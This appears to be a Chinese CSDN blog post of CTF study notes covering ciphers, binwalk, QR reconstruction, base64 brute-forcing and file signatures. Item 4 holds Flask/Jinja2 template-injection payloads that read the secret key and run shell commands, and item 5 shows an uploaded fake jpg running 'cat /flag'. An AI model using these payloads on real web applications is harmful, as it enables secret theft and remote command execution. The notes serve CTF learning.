1、栅栏密码:CTF在线工具-在线栅栏密码加密|在线栅栏密码解密|栅栏密码算法|Railfence Cipher
有点像代换密码。
2、在线识图工具,可以识别图片地点
3、binwalk工具,可以使用。。进行解压隐藏的jpg文件,属性的设备信息竟然是16进制码hex
binwalk -e 文件名
4、flask模版注入flag={{config.SECRET_KEY}}
flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read()}}类似命令执行,通过目录进行寻找app/flag
5、文件上传,直接上传有python代码的jpg文件,F12源代码提示中有flag
import os
os.system('cat /flag')
6、编译二维码(参考:BugKu:0和1的故事(writeup)_哇哈爱吃糖的博客-CSDN博客_bugku0和1)
from PIL import Image
with open("1和0的故事.txt", "r") as f:
data = [list(i.strip()) for i in f.readlines()]
# 7*7的定位标志
flag = [
[1, 1, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 1],
[1, 0, 1, 1, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 1],
[1, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 1, 1]
]
img = Image.new("1", (25, 25))
for i in range(len(data)):
for j in range(len(data[1])):
# 左上角定位标志
if i < 7 and j < 7:
img.putpixel((i, j), flag[i][j] ^ 1)
# 左下角定位标志
elif i > 17 and j < 7:
img.putpixel((i, j), flag[i-18][j] ^ 1)
# 右上角定位标志
elif i < 7 and j > 17:
img.putpixel((i, j), flag[i][j-18] ^ 1)
else:
img.putpixel((i, j), int(data[i][j]) ^ 1)
img.resize((500, 500)).show()
7、抄错的字符
以下是我写的小程序,通过运行程序可以进行base64解码并得到相应的字符,进行拼接。把字符串分成4个一组进行的解码,用分割线隔开。
import math,base64
corpt="QWIHBLGZZXJSXZNVBZW"
#base64分割成4个一组
#两个数据遍历函数
def twoTo(list1,list2):
result=[]
for i in list1:
for j in list2:
result.append(str(i)+str(j))
return result
#获取数组长度
length=math.ceil(len(corpt)/4)
lcorpt=[]
#分割字符串
for i in range(length):
lcorpt.append(corpt[i*4:i*4+4])
#补充数据=
if len(lcorpt[-1])==1:
lcorpt[-1]=lcorpt[-1]+"="*3
elif len(lcorpt[-1])==2:
lcorpt[-1]=lcorpt[-1]+"="*2
elif len(lcorpt[-1])==3:
lcorpt[-1]=lcorpt[-1]+"="*1
else:
print("prefect")
lalp={"A":["A","a"],"B":["B","b"],"C":["C","c"],"D":["D","d"],"E":["E","e"],
"F":["F","f"],"G":["G","g",9],"H":["H","h"],"I":["I","i",1],"J":["J","j"],
"K":["K","k"],"L":["L","l"],"M":["M","m"],"N":["N","n"],"O":["O","o",0],
"P":["P","p"],"Q":["Q","q",9],"R":["R","r"],"S":["S","s",5],"T":["T","t"],
"U":["U","u"],"V":["V","v"],"W":["W","w"],"X":["X","x"],"Y":["Y","y"],"Z":["Z","z",2],"=":"="}
list1=[]
#循环四字数组
for i in lcorpt:
#循环数组字符串
print("====================")
fistli=twoTo(lalp[i[0]],lalp[i[1]])
secondli=twoTo(lalp[i[2]],lalp[i[3]])
#循环前后两组进行配对
for k in fistli:
for m in secondli:
try:
flag=base64.urlsafe_b64decode(k+m).decode("utf-8")
print(flag)
except Exception as e:
print("")
8、base58:Base58不使用数字"0",字母大写"O",字母大写"I",和字母小写"l",以及"+"和"/"符号。
binwalk用来查看文件类型,hex fiend用来查看二进制文件比如图片等
16进制文件头对应的文件类型
常用文件的文件头如下:
JPEG (jpg),文件头:FFD8FF
PNG (png),文件头:89504E47
GIF (gif),文件头:47494638
TIFF (tif),文件头:49492A00
Windows Bitmap (bmp),文件头:424D
CAD (dwg),文件头:41433130
Adobe Photoshop (psd),文件头:38425053
Rich Text Format (rtf),文件头:7B5C727466
XML (xml),文件头:3C3F786D6C
HTML (html),文件头:68746D6C3E
Email [thorough only] (eml),文件头:44656C69766572792D646174653A
Outlook Express (dbx),文件头:CFAD12FEC5FD746F
Outlook (pst),文件头:2142444E
MS Word/Excel (xls.or.doc),文件头:D0CF11E0
MS Access (mdb),文件头:5374616E64617264204A
WordPerfect (wpd),文件头:FF575043
Postscript (eps.or.ps),文件头:252150532D41646F6265
Adobe Acrobat (pdf),文件头:255044462D312E
Quicken (qdf),文件头:AC9EBD8F
Windows Password (pwl),文件头:E3828596
ZIP Archive (zip),文件头:504B0304
RAR Archive (rar),文件头:52617221
Wave (wav),文件头:57415645
AVI (avi),文件头:41564920
Real Audio (ram),文件头:2E7261FD
Real Media (rm),文件头:2E524D46
MPEG (mpg),文件头:000001BA
MPEG (mpg),文件头:000001B3
Quicktime (mov),文件头:6D6F6F76
Windows Media (asf),文件头:3026B2758E66CF11
MIDI (mid),文件头:4D546864
————————————————
版权声明:本文为CSDN博主「迷失蒲公英」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_26721093/article/details/126685438